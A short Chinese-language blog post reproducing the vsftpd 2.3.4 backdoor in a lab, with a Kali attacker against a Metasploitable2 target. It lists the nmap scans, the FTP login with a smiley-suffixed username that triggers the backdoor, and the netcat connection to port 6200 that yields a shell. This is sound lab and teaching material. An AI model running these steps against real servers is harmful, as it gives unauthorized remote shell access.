漏洞复现(vsftpd 2.3.4)
漏洞复现(vsftpd 2.3.4)
工具:
攻击机:kali: 192.168.118.128
靶机:Metasplotable2-Linux: 192.168.118.131
开始复现
打开kali终端,执行以下命令
nmap 192.168.118.0/24
发现靶机(192.168.118.131)打开着21端口
nmap -sV 192.168.118.131
这里可以看到靶机的ftp服务的版本信息是vsftpd 2.3.4,漏洞就在这里
ftp 192.168.118.131 21
用户名 root:)//':)'是触发条件
密码: sssss //密码可乱来
执行以上命令后发现靶机打开了6200端口,这就是个后门
然后直接连接这个端口
nc 192.168.118.131 6200
成功连接,后门建立了shell,可以开始执行命令
复现结束
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Tree's Blog!